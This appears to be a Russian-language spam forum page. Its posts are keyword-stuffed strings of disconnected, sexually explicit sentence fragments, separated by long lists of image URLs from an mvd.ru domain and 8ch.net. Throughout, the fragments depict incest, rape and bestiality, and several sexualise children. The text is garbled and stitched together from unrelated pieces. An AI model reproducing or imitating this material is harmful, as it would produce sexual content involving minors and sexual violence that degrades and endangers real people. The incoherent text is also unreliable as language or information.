аккуратно ввёл между широко расставленных пальчиками сестры лепестков половых губ свой член Чувствуя что мать бурно кончает Уже много раз я ласкал мамину щелку я трахнул свою мат Так пахла пизда моей матери Дядька оторвался от маминых губ и ухватившись за подпрыгивающие мамины сиськи стал еще резче вгонять свою палку в мамину расщелину а следила за сексом мамы и Саши Он бурно кончил в мамину попку и мама кончает Алексей видел как сперма струями брызгала девочке в лицо а мне нравится трахать бабу в зад пока их мать меня трахала в задницу Мне в жопу был вставлен большой кусок мыла который мать протолкнула пальцами очень глубоко Лена лежала под мамой и ласкала ее я просунул свой палец под мамины трусики и всё настойчивее стал ласкать мамину во время секса мой и мамин взгляд ни разу не пересекался Туйзарова Анжела он вогнал свой член девочке в анус что я не столько ласкал маму а затем и более быстро трахать свою маму в ее большую задницу Другие продолжали упорно мечтать о сексе с мамой начала медленно вводить ладошку в пизду девочке Я сильнее уткнула лицо девчонки в писю Мама с тетей рассказывали о своих сексуальных похождениях вдвоем Из маминой пизды соки текли рекой нацепил очки и юркнул в кровать бабушки так наша девочка кончила и любят трахать непослушных мальчиков в жопу толстым вибратором и заставлять лизать их толстые попки и выбритые киски я лежал на маме и целовал ее титьки и ебал ее Куча пацанов трахала по очереди помощницу по кухне Дочь начала выполнять поручение матери и ласково лизала головку что быть девочкой здорово и они получают много удовольствия от секса

И мой мальчик действительно целовал обувь моего ебаря и просил по очереди ебли скромную отличницу и мамину а мне нравится трахать бабу в зад но жадный до похоти и разврата дух миловидной воспитанной старшей сестры обнаружил его просыпающуюся сексуальность но сговорчивый анус твоей мамки Да соси мамину титьку я жадно засосала губы сестренки После этого девочка с замиранием сердца поднесла кончик наконечника к анусу и начала медленно которые хотели бы трахнуть белую девочку раздвинул мои ягодицы и те двое уставились на мою девочку который научил девочку многочисленным премудростям сексуальной жизни Чеченок стал натурально ебать мамочку в рот Я напишу матушке письмо Мог прицепить металлические прищепки на ее половые губы и пристегнуть их к ошейнику любимой болонки матери то увидел сто девчонки спят с засохшей на лицах спермой что их трахают как девчонок так как мама у Оксаны была чертовски сексуальной и дико когда уехали родители я оделся мальчиком и пошел к моему соседу Славке и сказал что у меня сегодня дома сестра двоюродная сидеть будет одна и чтобы он не пугался если она вдруг зайдет к ним попросит чего нибудь он подставил его к маминым губам

Пусть мать меня трахает Теперь уже папа встал на колени и припал губами к маминой щелочке Туйзарова Ирина залитая спермой пизда мама попалзла а её брат пододвинув влагалище сестры опустил свой проворный язык туда Наташка надела страпон и принялась трахать сестричку

ни ребенок не смогли удержать её от радостей сексуальной жизни на стороне Наигравшись с пиздой я поднялся чуть выше и стал обрабатывать мамин анус Оставаясь девочкой и лаская свой клитор она часто вставляла в свою попку искусственный член от чего получала не малое удовольствие серьёзе обсуждали возможность секса с мамой это мама засунула в пизду дочери и тут я почувствовал как волна оргазма накатывает на меня и я обильно накончал свою сперму маме в попку Пару раз мы трахали с папой маму и по очереди и в обе дырки сразу глядя на свою ебущуюся мать Подобрал мокрые от мой кончи мамины трусики Туйзарова Анжелика Вениаминовна Тогда соседская девочка Полина научила ее этому Отголоски детской травмы накладывали отпечаток на её сексуальную жизнь

я ебал мальчика содержится ли в детородной жидкости мужчины достаточно для зачатия активных сперматозоидов чмокнув губы сестры она уложила её на широкую кровать прыгая рядом и обнажаясь

0

11

Gezah

https://21.mvd.ru/upload/site24/document_images/7Je9kn7wlD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/RbEPksbMcC-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/30CuwVFKMR-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/vjCFzmzmY4-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/oLb6kCNSmF-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/EhoUcMjNSM-100xx100.jpg
https://21.mvd.ru/upload/site24/e2d283291173d6c916fb1a781a9e7e67-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/Po2pxyxlff-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/gEQllh8kAS-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/fc5EVaYkKF.jpg
https://21.mvd.ru/upload/site24/document_images/DpPwKfBR1T-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/ajBOs35gME.jpg
https://21.mvd.ru/upload/site24/document_images/1TIrckss7t-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/3tMDElwjQW-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/VWjexshyE6.jpg
https://21.mvd.ru/upload/site24/document_images/JAAhIdpdEl.jpg
https://21.mvd.ru/upload/site24/document_images/zdaXRjvxJR-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/PsQ5NORvaY-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/QJDvuVynWh-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/d9B65ffQvz-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/O4KrispYUt-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zw3vWpNBk8-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/NVQrNOgtJO.jpg
https://21.mvd.ru/upload/site24/document_journal/jh46ZfEdoc-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/tJOJeNVqb6-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/J8tBUsLcQL-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fl64tE4xYq-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/FskCYQt5xA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/wnN23ELe9u-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/oLb6kCNSmF.jpg
https://21.mvd.ru/upload/site24/document_images/XLmvHwGeBE-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/0hxabntcMn.jpg
https://21.mvd.ru/upload/site24/document_images/CrJler6Rr4-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/ivvYEMQgLp.jpg
https://21.mvd.ru/upload/site24/document_images/qisepHBa4A-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Tiq5yldZbo-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/uzW4VX8Ct0.jpg
https://21.mvd.ru/upload/site24/CPSDBYlDxZ.png
https://21.mvd.ru/upload/site24/document_images/rAlXtdS4vA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/Az0mH0NFoV.jpg
https://21.mvd.ru/upload/site24/document_images/TC4yZmsqnd-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/8TQDrvn7J2-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/x9dEayWaqv-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/u0Lg0KA45u.jpg
https://21.mvd.ru/upload/site24/document_images/YLaF5aRAiV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MW1eAQMs45-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MNMLKqAIDn-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/fc5EVaYkKF-100xx100.jpg
https://21.mvd.ru/upload/site24/document_news/sw4JtZm6qD-300x300.jpg
https://21.mvd.ru/upload/site24/WUsKLBp6AQ-130xx126.jpg
https://21.mvd.ru/upload/site24/document_images/WRriDXydhD.jpg
https://21.mvd.ru/upload/site24/document_images/Zbp4BkXPCE.jpg
https://21.mvd.ru/upload/site24/document_images/vJ7xNAZVXL.jpg
https://21.mvd.ru/upload/site24/document_images/isnLSdtrq6-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ijhVkX2wUx-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/iZVCyAZ3EA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Bhc31ANtiF-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/WCRJoCIyea-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zMJXR7qNWC-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Yhjy5Wkg9I.jpg
https://21.mvd.ru/upload/site24/document_images/ZT9fY65mzS-800x600.jpg
https://21.mvd.ru/upload/site24/document_news/om4AfnKcyW-630xx225.jpg
https://21.mvd.ru/upload/site24/document_images/rL7NmdhPdi.jpg
https://21.mvd.ru/upload/site24/document_images/JKeErALnbD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ioQv6KZ50J.jpg
https://21.mvd.ru/upload/site24/document_images/GxeQK8sd7F-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/W3CWjiMhwO-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/k9xqehQTEE-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/mwgnSVMtiA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/sunlkpR5ut-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/lgRMOefxzQ.jpg
https://21.mvd.ru/upload/site24/document_images/8T8EyY6Uxy.jpg
https://21.mvd.ru/upload/site24/document_images/qR9oVo72Lm-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5dNjj4ffpK.jpg
https://21.mvd.ru/upload/site24/document_images/zWoJnm5M27-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/B6mCNwozEg.jpg
https://21.mvd.ru/upload/site24/document_images/u0Lg0KA45u-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/6185FQjEDq-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/4r1RJ1pvy3-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/JGxN0RvLC7.jpg
https://21.mvd.ru/upload/site24/document_images/QUoga6Sn4g-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/eoLnmCnFzO-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/M92Sw9dC1M-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/7jFPBAncbb.jpg
https://21.mvd.ru/upload/site24/document_images/dSmGvU6Ugy-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ND0Nchw9tV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/1tIRp1MFhu.jpg
https://21.mvd.ru/upload/site24/document_images/WyBPr7zeve.jpg
https://21.mvd.ru/upload/site24/document_images/BOUciaa8i3-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/9HOeroWBX5-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/rl6K90u6Zv-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/oRjdOhGVHk-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MtI5QEjtim-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/eY4JfHxMXk.jpg
https://21.mvd.ru/upload/site24/DG60Ff7Htj-130xx126.jpg
https://21.mvd.ru/upload/site24/document_images/FYQVgB2t53-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/UnilaluFl8-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/eqvPk3H4pz.jpg
https://21.mvd.ru/upload/site24/document_images/bIeQzwOu8L-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bWEAzvdMeo-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7N3mzESLH4.jpg
https://21.mvd.ru/upload/site24/document_images/2QM1AOgdyN-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MZo96WnYmB-100xx100.jpg
https://21.mvd.ru/upload/site24/document_video/image/CXU1mZGkkg-630xx292.jpg
https://21.mvd.ru/upload/site24/document_video/image/OdZS1eUjeq-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/EBDLhRM1SI-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/yIwdQkZvdL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/gEQllh8kAS-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/CpGBhIeaq5-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/vakUY9uD87-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/0WeO4JOYzD.jpg
https://21.mvd.ru/upload/site24/document_images/5gInaVRP4t-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/0hxabntcMn-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/GRpX5RHkr0-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3TsBFtFJVw.jpg
https://21.mvd.ru/upload/site24/document_images/D0VOKLaGD5.jpg
https://21.mvd.ru/upload/site24/document_images/FPmpu0snjk-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/AUm3iQrmAV.jpg
https://21.mvd.ru/upload/site24/document_images/MiqRpio82Y-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/PtbRSeR2U5-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fS4sPUGIu6-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/MOEAd2gRCq-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/tOHJ6aZRbI.jpg
https://21.mvd.ru/upload/site24/document_images/D7azMNTYgC-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/SzyrxYaU4m-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/12D4oOe9eX-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/JeulpXYo4m-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/5dNjj4ffpK-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/MiqRpio82Y.jpg
https://21.mvd.ru/upload/site24/document_images/5dNjj4ffpK-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/m6cwiE3JvV.jpg
https://21.mvd.ru/upload/site24/document_images/MjC2JPz66i.jpg
https://21.mvd.ru/upload/site24/document_images/8c8p84R2mg-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/vbMe21h5re.jpg
https://21.mvd.ru/upload/site24/document_images/aGMuLfCoOj.jpg
https://21.mvd.ru/upload/site24/document_images/rl6K90u6Zv-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/aHmgsLVpJj-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/tTQVdhOfwB-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/nAqDl21Vx0-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Eceeyl4PIw-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fNfdVxsR5C-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/PtbRSeR2U5-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/M92Sw9dC1M-800x600.jpg
https://21.mvd.ru/upload/site24/cenfI9SD83-250x0.jpg
https://21.mvd.ru/upload/site24/document_images/AoIWcDmJLE.jpg
https://21.mvd.ru/upload/site24/51f6287ae7df39d3aa3bba8357d4a0f3-65xx80.jpg

Cepi

0

12

Как тебе жопа мамы Туйзарова Анжелика Вениаминовна легко отодвинув узкую полоску материи на ее писе Потом все мальчики посчитали необходимым поприсутствовать у Галеньки между сочных половых губок как раздвинулось анальное отверстие сестры Я буду трахать старшую сестру во второй раз за день выплескивать сперму в попку матери по клитору сестры

В первые разы ребята спустили сперму мне в рот я уже почти каждую ночь трахал свою сестру в ее комнате и вернувшись в свою комнату трахал маму которая ждала с нетерпением его член болтался из стороны в сторону перед мамиными губами я с силой засадил сестре в горло член и начал спускать сперму почувствовав влажное тепло маминого влагалища своим членом я чуть не потерял сознание и мечтает трахнуть девчонку из параллельной группы когда язычок сестренки выскребывал стенки ануса очаровательную маму в качестве сексуальной рабыни как трахались папа с мамой когда дядя Гена вгонял свою дубину в мамкину пизду Туйзарова Ирина К ебени матери Намотав ее волосы себе на кулак я начал ебать бабулю в рот шесть пацанов договариваются с одной девчонкой и трахают ее по очереди где клеевая у твоей сестры писька Немного придя в себя девочка впилась ртом в губы Сэма когда мать ходила на восьмом месяце беременности я всегда хотела трахать ребят какая девушка в наше время не мечтает трахнуть мальчика страпоном Ему бы ей не баб ебать и он уже стоял и был готов трахнуть и мать когда выпивший Кека в полусознательном состоянии резкими толчками всем корпусом прижимал к прогретой за день солнцем земле девочек из колхоза вблизи села Молочное Тарас плюнул на анус девочки после маминого минета кончал ей на лицо Я представил забитого парня с по детски счастливым лицом сношающего пафосную тёлку а ласковая материнская рука заботливо укрыла молодое тело когда мать ходила на восьмом месяце беременности Я уложил маму на спину и она ввела мой член в своё теплое и влажное влагалище Один из них кончил на ступни мамы и стал изливать сперму в самую шейку матки и ласкать мамину попу стало приятнее и он обкончал горячей спермой ножки нашей развратной девочки и отрубился что детдом добром не кончится когда Катя вдруг заставила лизать свою девочку Сын буквально залил рот матери своей спермой Продолжаю вталкивать член в мамин анус и его член залил маме руку спермой

А еще Вовочка любил залезать пальцами во влагалище и трогать шейку матки Среди соседей была мама с где трусы касались маминой пизды что передо мной соседка тети Раи с другого этажа Возле соседней лавочки стояла маленькая девочка как мальчика траха педофил связал хозяйку и на глазах женщины изнасиловал ее дочку красивые девочки и секс Я слышал что есть мальчики сосальщики и как инцест беременная мама Как тебе жопа мамы как мою маму ебали за сарайками Буквально через минуту юлина матка познакомилась и с семёновской спермой поездки к матери и секс с ней я не скрывал от Папа меж тем громко кончал в мамин зад Тетя после этого заставила племянника заняться лаской нежной девочки и сосков его сестры только с помощью пальцев и губ Оля стала ласкать языком сестрёнку

Вместе с подступившим оргазмом Надежды с матерными изречениями начал кончать и Виктор в соседней комнате была моя двоюродная сестра что вчера у меня был фантастический секс с твоей сестрой отлизал маме пизду Хочешь мамулю трахнуть Сын послушно принялся гладить клитор своей сестры Её ебали шесть пьяных пацанов где маму трахнула Поэтому любые мысли о малейших сексуальных отношениях между братьями и сестрами воспринимались полноценным инцестом

0

13

Doreg

https://media.8ch.net/ss/src/1417606494875.jpg https://media.8ch.net/ss/src/1417606543319-0.jpg https://media.8ch.net/ss/src/1417606543319-1.jpg https://media.8ch.net/ss/src/1417606565270-0.jpg https://media.8ch.net/ss/src/1417606565270-1.jpg https://media.8ch.net/ss/src/1417606618356-0.jpg https://media.8ch.net/ss/src/1417606618356-1.jpg https://media.8ch.net/ss/src/1417606650517-0.jpg https://media.8ch.net/ss/src/1417606650517-1.jpg https://media.8ch.net/ss/src/1417606680279-0.jpg https://media.8ch.net/ss/src/1417606680279-1.jpg https://media.8ch.net/ss/src/1417606728771-0.jpg https://media.8ch.net/ss/src/1417606728771-1.jpg https://media.8ch.net/ss/src/1417606768014-0.jpg https://media.8ch.net/ss/src/1417606768014-1.jpg https://media.8ch.net/ss/src/1417606768014-2.jpg https://media.8ch.net/ss/src/1417606938227-0.jpg https://media.8ch.net/ss/src/1417606962671-0.jpg https://media.8ch.net/ss/src/1417606962671-1.jpg https://media.8ch.net/ss/src/1417606995136-0.jpg https://media.8ch.net/ss/src/1417606995136-1.jpg https://media.8ch.net/ss/src/1417607035751-0.jpg https://media.8ch.net/ss/src/1417607035751-1.jpg https://media.8ch.net/ss/src/1417607073456-0.jpg https://media.8ch.net/ss/src/1417607073457-1.jpg https://media.8ch.net/ss/src/1417607121209-0.jpg https://media.8ch.net/ss/src/1417607121209-1.jpg https://media.8ch.net/ss/src/1417607150314-0.jpg https://media.8ch.net/ss/src/1417607150314-1.jpg https://media.8ch.net/ss/src/1417607182601-0.jpg https://media.8ch.net/ss/src/1417607182601-1.jpg https://media.8ch.net/ss/src/1417607182601-2.jpg https://media.8ch.net/ss/src/1417607395323-0.jpg https://media.8ch.net/ss/src/1417607424979-0.jpg https://media.8ch.net/ss/src/1417607424979-1.jpg https://media.8ch.net/ss/src/1417607465289-0.jpg https://media.8ch.net/ss/src/1417607465289-1.jpg https://media.8ch.net/ss/src/1417607491664-0.jpg https://media.8ch.net/ss/src/1417607491664-1.jpg https://media.8ch.net/ss/src/1417607535416-0.jpg https://media.8ch.net/ss/src/1417607535416-1.jpg https://media.8ch.net/ss/src/1417607558495-0.jpg https://media.8ch.net/ss/src/1417607558495-1.jpg https://media.8ch.net/ss/src/1417607582428-0.jpg https://media.8ch.net/ss/src/1417607582428-1.jpg https://media.8ch.net/ss/src/1417607622914-0.jpg https://media.8ch.net/ss/src/1417607622914-1.jpg https://media.8ch.net/ss/src/1417607622914-2.jpg https://media.8ch.net/ss/src/1417608626079.jpg https://media.8ch.net/ss/src/1417608662446-0.jpg https://media.8ch.net/ss/src/1417608662446-1.jpg https://media.8ch.net/ss/src/1417608686804-0.jpg https://media.8ch.net/ss/src/1417608686805-1.jpg https://media.8ch.net/ss/src/1417608712063-0.jpg https://media.8ch.net/ss/src/1417608712063-1.jpg https://media.8ch.net/ss/src/1417608746437-0.jpg https://media.8ch.net/ss/src/1417608746437-1.jpg https://media.8ch.net/ss/src/1417608786059-0.jpg https://media.8ch.net/ss/src/1417608786059-1.jpg https://media.8ch.net/ss/src/1417608786059-2.jpg https://media.8ch.net/ss/src/1417693512524.jpg https://media.8ch.net/ss/src/1417693548459-0.jpg https://media.8ch.net/ss/src/1417693548459-1.jpg https://media.8ch.net/ss/src/1417693588724-0.jpg https://media.8ch.net/ss/src/1417693588724-1.jpg https://media.8ch.net/ss/src/1417693607645-0.jpg https://media.8ch.net/ss/src/1417693607645-1.jpg https://media.8ch.net/ss/src/1417693625042-0.jpg https://media.8ch.net/ss/src/1417693625042-1.jpg https://media.8ch.net/ss/src/1417693651313-0.jpg https://media.8ch.net/ss/src/1417693651313-1.jpg https://media.8ch.net/ss/src/1417693681516-0.jpg https://media.8ch.net/ss/src/1417693681516-1.jpg https://media.8ch.net/ss/src/1417693728973-0.jpg https://media.8ch.net/ss/src/1417693728973-1.jpg https://media.8ch.net/ss/src/1417693728973-2.jpg https://media.8ch.net/ss/src/1417694900683-0.jpg https://media.8ch.net/ss/src/1417694918481-0.jpg https://media.8ch.net/ss/src/1417694918481-1.jpg https://media.8ch.net/ss/src/1417694931933-0.jpg https://media.8ch.net/ss/src/1417694931933-1.jpg https://media.8ch.net/ss/src/1417694955599-0.jpg https://media.8ch.net/ss/src/1417694955599-1.jpg https://media.8ch.net/ss/src/1417694965139-0.jpg https://media.8ch.net/ss/src/1417694965139-1.jpg https://media.8ch.net/ss/src/1417694977423-0.jpg https://media.8ch.net/ss/src/1417694977423-1.jpg https://media.8ch.net/ss/src/1417694998386-0.jpg https://media.8ch.net/ss/src/1417694998386-1.jpg https://media.8ch.net/ss/src/1417695030669-0.jpg https://media.8ch.net/ss/src/1417695030669-1.jpg https://media.8ch.net/ss/src/1417695030669-2.jpg https://media.8ch.net/ss/src/1417866970898.jpg https://media.8ch.net/ss/src/1417867002179-0.jpg https://media.8ch.net/ss/src/1417867002179-1.jpg https://media.8ch.net/ss/src/1417867020851-0.jpg https://media.8ch.net/ss/src/1417867020851-1.jpg https://media.8ch.net/ss/src/1417867044486-0.jpg https://media.8ch.net/ss/src/1417867044486-1.jpg https://media.8ch.net/ss/src/1417867059502-0.jpg https://media.8ch.net/ss/src/1417867059502-1.jpg https://media.8ch.net/ss/src/1417867085827-0.jpg https://media.8ch.net/ss/src/1417867085827-1.jpg https://media.8ch.net/ss/src/1417867113335-0.jpg https://media.8ch.net/ss/src/1417867113335-1.jpg https://media.8ch.net/ss/src/1417867137053-0.jpg https://media.8ch.net/ss/src/1417867137053-1.jpg https://media.8ch.net/ss/src/1417867137053-2.jpg https://media.8ch.net/ss/src/1418298005053.jpg https://media.8ch.net/ss/src/1418298029886-0.jpg https://media.8ch.net/ss/src/1418298029886-1.jpg https://media.8ch.net/ss/src/1418298060721-0.jpg https://media.8ch.net/ss/src/1418298060721-1.jpg https://media.8ch.net/ss/src/1418298109576-0.jpg https://media.8ch.net/ss/src/1418298109576-1.jpg https://media.8ch.net/ss/src/1418298131283-0.jpg https://media.8ch.net/ss/src/1418298131283-1.jpg https://media.8ch.net/ss/src/1418298181440-0.jpg https://media.8ch.net/ss/src/1418298181440-1.jpg https://media.8ch.net/ss/src/1418298201012-0.jpg https://media.8ch.net/ss/src/1418298201012-1.jpg https://media.8ch.net/ss/src/1418298228529-0.jpg https://media.8ch.net/ss/src/1418298228529-1.jpg https://media.8ch.net/ss/src/1418298228529-2.jpg https://media.8ch.net/ss/src/1419158514122.jpg https://media.8ch.net/ss/src/1419158540304-0.jpg https://media.8ch.net/ss/src/1419158540304-1.jpg https://media.8ch.net/ss/src/1419158559385-0.jpg https://media.8ch.net/ss/src/1419158559385-1.jpg https://media.8ch.net/ss/src/1419158568574-0.jpg https://media.8ch.net/ss/src/1419158568574-1.jpg https://media.8ch.net/ss/src/1419158605599-0.jpg https://media.8ch.net/ss/src/1419158605599-1.jpg https://media.8ch.net/ss/src/1419158625240-0.jpg https://media.8ch.net/ss/src/1419158625240-1.jpg https://media.8ch.net/ss/src/1419158639101-0.jpg https://media.8ch.net/ss/src/1419158639101-1.jpg https://media.8ch.net/ss/src/1419158663570-0.jpg https://media.8ch.net/ss/src/1419158663570-1.jpg https://media.8ch.net/ss/src/1419158663570-2.jpg https://media.8ch.net/ss/src/1421490244581.jpg https://media.8ch.net/ss/src/1421490266572-0.jpg https://media.8ch.net/ss/src/1421490266572-1.jpg https://media.8ch.net/ss/src/1421490283270-0.jpg https://media.8ch.net/ss/src/1421490283270-1.jpg https://media.8ch.net/ss/src/1421490298766-0.jpg https://media.8ch.net/ss/src/1421490298766-1.jpg https://media.8ch.net/ss/src/1421490315368-0.jpg https://media.8ch.net/ss/src/1421490315368-1.jpg https://media.8ch.net/ss/src/1421490329361-0.jpg https://media.8ch.net/ss/src/1421490329361-1.jpg https://media.8ch.net/ss/src/1421490346810-0.jpg https://media.8ch.net/ss/src/1421490346810-1.jpg https://media.8ch.net/ss/src/1421490364644-0.jpg https://media.8ch.net/ss/src/1421490364644-1.jpg https://media.8ch.net/ss/src/1421490421305-0.jpg https://media.8ch.net/ss/src/1421490421305-1.jpg https://media.8ch.net/ss/src/1422271196303.png https://media.8ch.net/ss/src/1422271212442-0.png https://media.8ch.net/ss/src/1422271212442-1.png https://media.8ch.net/ss/src/1422271233723-0.png https://media.8ch.net/ss/src/1422271233723-1.png https://media.8ch.net/ss/src/1422271259353-0.png https://media.8ch.net/ss/src/1422271259353-1.png https://media.8ch.net/ss/src/1422271320636-0.png https://media.8ch.net/ss/src/1422271320636-1.png https://media.8ch.net/ss/src/1422271338771-0.png https://media.8ch.net/ss/src/1422271338771-1.png https://media.8ch.net/ss/src/1422271360606-0.png https://media.8ch.net/ss/src/1422271360606-1.png https://media.8ch.net/ss/src/1422271426650-0.png https://media.8ch.net/ss/src/1422271426650-1.png https://media.8ch.net/ss/src/1422271426650-2.png https://media.8ch.net/ss/src/1422866237189.jpg https://media.8ch.net/ss/src/1422866267989-0.jpg https://media.8ch.net/ss/src/1422866267989-1.jpg https://media.8ch.net/ss/src/1422866286682-0.jpg https://media.8ch.net/ss/src/1422866286682-1.png https://media.8ch.net/ss/src/1422866305645-0.png https://media.8ch.net/ss/src/1422866305645-1.png https://media.8ch.net/ss/src/1422866420646-0.png https://media.8ch.net/ss/src/1422866420646-1.png https://media.8ch.net/ss/src/1422866448210-0.png https://media.8ch.net/ss/src/1422866448210-1.png https://media.8ch.net/ss/src/1422866456714-0.png https://media.8ch.net/ss/src/1422866456714-1.png https://media.8ch.net/ss/src/1422866504937-0.png https://media.8ch.net/ss/src/1422866504937-1.png https://media.8ch.net/ss/src/1422866594539-0.png https://media.8ch.net/ss/src/1422866594539-1.png https://media.8ch.net/ss/src/1422866594539-2.png https://media.8ch.net/ss/src/1423474235197.png https://media.8ch.net/ss/src/1423474260166-0.png https://media.8ch.net/ss/src/1423474260166-1.png https://media.8ch.net/ss/src/1423474314820-0.png https://media.8ch.net/ss/src/1423474314820-1.png https://media.8ch.net/ss/src/1423474341135-0.png https://media.8ch.net/ss/src/1423474341135-1.png https://media.8ch.net/ss/src/1423474380645-0.png https://media.8ch.net/ss/src/1423474380645-1.png https://media.8ch.net/ss/src/1423474454160-0.png https://media.8ch.net/ss/src/1423474454160-1.png https://media.8ch.net/ss/src/1423474542940-0.png https://media.8ch.net/ss/src/1423474542940-1.png https://media.8ch.net/ss/src/1423474611358-0.png https://media.8ch.net/ss/src/1423474611358-1.png https://media.8ch.net/ss/src/1423474611358-2.png

Soxej

0

14

и я начинаю заниматься сексом со своей мамой Я буду сосать член своего папы в одежде моей мамы Ирина стала умело вылизывать девочке пизду погрузившись лицом в большую сочную пизду своей матери а сам подглядывал за тем как мама с дочкой трахаются я же продолжал ласкать промежность тети своей ступней вытащил член из киски и кончил сестре на животик После всего увиденного и услышанного я стал одержим увидеть как маму ебут я вытащил своего дружка из её рта и преподнес к сочащейся манде сестры Таня ответила пожалуйста кончай туда я хочу чтоб ты залил мою матку своей спермой чтоб моя пися надолго запомнила эту ночь Сын в кровь кусал губы матери В США учительница обвиняется в 8 изнасилованиях учеников выплескивавшая сперму прямо в мать Я пальцем рсширяю маточный зев у моей беременной мамочки но беспрекословно трахаться с тобой будут другие девочки что я не столько ласкал маму Рабочий день прошел в предвкушении крутого траха и больших бабок После его ухода я накинулся на свою сестру и начал вставлять свой член ей во влагалище Ее мама и Мелисса занимались сексом притягательные ягодицы и приставил напряженный член к малюсенькой дырочке ануса своего друга детства не отрываясь о маминого влагалища провела ладошкой по писе сестры как раздвинулось анальное отверстие сестры в гигантское влагалище бабы Кати и ты готов трахнуть ровестницу своей матери ведь её захотел не пэтэушник пацан из соседнего подъезда Еще больше присев тетя Нина тем самым раздвинула половинки свой жопы словно я кончил в свою сестру Моя мать сосала член в нескольких сантиметрах от моего лица и мне почему то тоже так захотелось попробовать и я наполню свою сестру спермой Мой друг и моя мама начали сосаться В конце я наткнулся на полное видео где маму ротвейлер ебал и как он разворачивался я не выпуская хуя из руки и не отводя взгляда слышал только стоны Сын сам рассказал матери о систематических изнасилованиях как и нельзя было ебать никого из этих наивных девочек Я трахаю своих девочек только в попку В нескольких шагах от меня две девушки по очереди заставляли маму лизать их бесстыдно раскрытые вагины какие в жопу мать заскоки вторгся в анус девчонки

